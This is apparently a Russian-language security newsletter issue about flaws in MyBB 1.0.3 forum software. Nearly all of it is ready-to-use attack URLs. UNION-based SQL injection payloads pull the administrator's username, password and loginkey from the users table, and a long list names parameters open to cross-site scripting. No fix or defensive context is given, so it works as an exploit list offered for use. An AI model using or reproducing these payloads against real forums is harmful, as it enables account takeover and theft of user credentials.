Отправляет email-рассылки с помощью сервиса Sendsay
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в MyBB.


Компьютер для продвинутых пользователей
Содержание:
MyBB
ПО: MyBB
Версия: 1.0.3

Использование:
SQL-инъекции.

Похищение имени пользователя для администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,username,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Похищение пароля для администратора:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Похищение Loginkey:
misc.php?action=buddypopup&GLOBALS[]=null&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*
private.php?action=send&uid=-1&GLOBALS[]=1&sql=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20mybb_users%20where%20uid=1/*

Ну, и просто работа с пользователями:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20username,null%20from%20mybb_users%20where%20uid=1/*

Пароль:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20password,null%20from%20mybb_users%20where%20uid=1/*

Loginkey:
showteam.php?GLOBALS[]=1&comma=-2)%20union%20select%20uid,loginkey,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,4%20from%20mybb_users%20where%20usergroup=4/*
usercp.php?action=editlists&GLOBALS[]=1&comma=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&buddysql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&ignoresql=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*
usercp.php?action=editlists&GLOBALS[]=1&comma2=-1)%20union%20select%20loginkey,null%20from%20mybb_users%20where%20uid=1/*

XSS-инъекции:
Ссылка для инъекции находится в forumdisplay.php?fid=1, после ссылочки добавляем &">&.

Так же инъекции проводятся в:
index.php?GLOBALS[]=1&onlinemembers=
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&events=
calendar.php?action=dayview&year=2006&month=2&day=1&&GLOBALS[]=1&bdaylist=
calendar.php?action=editevent&eid=1&GLOBALS[]=1&yearopts=
editpost.php?pid=1&GLOBALS[]=1&attachments=
forumdisplay.php?fid=1&GLOBALS[]=1&modlist=
forumdisplay.php?fid=1&GLOBALS[]=1&onlinemembers=
forumdisplay.php?fid=2&GLOBALS[]=1&announcements=
forumdisplay.php?fid=2&GLOBALS[]=1&threads=
memberlist.php?GLOBALS[]=1&member=
misc.php?action=help&GLOBALS[]=1§ions=
misc.php?action=whoposted&GLOBALS[]=1&whoposted=
misc.php?action=smilies&GLOBALS[]=1&smilies=
online.php?action=today&GLOBALS[]=1&todayrows=
portal.php?GLOBALS[]=1&onlinemembers=
portal.php?GLOBALS[]=1&threadlist=
portal.php?GLOBALS[]=1&announcements=
private.php?GLOBALS[]=1&messagelist=
private.php?action=tracking&GLOBALS[]=1&readmessages=
private.php?action=tracking&GLOBALS[]=1&unreadmessages=
private.php?action=folders&GLOBALS[]=1&folderlist=
private.php?action=folders&GLOBALS[]=1&newfolders=
showteam.php?GLOBALS[]=1&usergrouprows=
showteam.php?GLOBALS[]=1&usergroups=
showthread.php?tid=1&GLOBALS[]=1&posts=
showthread.php?tid=1&GLOBALS[]=1&polloptions=
stats.php?GLOBALS[]=1&mostreplies=
usercp.php?action=profile&GLOBALS[]=1&bdaydaysel=
usercp.php?action=profile&GLOBALS[]=1&returndatesel=
usercp.php?action=profile&GLOBALS[]=1&select=
usercp.php?action=profile&GLOBALS[]=1&requiredfields=
usercp.php?action=profile&GLOBALS[]=1&customfields=
usercp.php?action=options&GLOBALS[]=1&langoptions=
usercp.php?action=options&GLOBALS[]=1&tppoptions=
usercp.php?action=options&GLOBALS[]=1&pppoptions=
usercp.php?action=favorites&GLOBALS[]=1&threads=
usercp.php?action=favorites&GLOBALS[]=1&folder=">
usercp.php?action=subscriptions&GLOBALS[]=1&threads=
usercp.php?action=subscriptions&GLOBALS[]=1&folder=
usercp.php?action=subscriptions&GLOBALS[]=1&forumsubscriptions=
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forumsubscriptions=
usercp.php?action=forumsubscriptions&GLOBALS[]=1&forums=
usercp.php?action=avatar&GLOBALS[]=1&galleries=
usercp.php?action=editlists&GLOBALS[]=1&buddylist=
usercp.php?action=editlists&GLOBALS[]=1&ignorelist=
usercp.php?action=editlists&GLOBALS[]=1&newlist=
usercp.php?action=drafts&GLOBALS[]=1&drafts=
usercp.php?action=usergroups&GLOBALS[]=1&groupsledlist=
usercp.php?action=usergroups&GLOBALS[]=1&joinablegrouplist=

MyBB
Рассылка создана и ведется при поддержке Информационной сети Пермского края.

В избранное